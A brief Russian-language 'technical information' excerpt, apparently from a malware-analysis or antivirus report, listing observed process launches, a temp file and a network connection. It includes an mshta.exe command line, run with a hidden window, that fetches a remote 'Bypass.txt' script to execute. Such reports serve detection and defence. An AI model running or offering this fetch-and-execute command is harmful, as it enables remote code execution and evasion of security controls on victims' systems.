Техническая информация
- '<SYSTEM32>\mshta.exe' http://19#.168.1.6/Bypass.txt
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\1378752.cvr
- '<LOCALNET>.1.6':80
- '<SYSTEM32>\mshta.exe' http://19#.168.1.6/Bypass.txt' (со скрытым окном)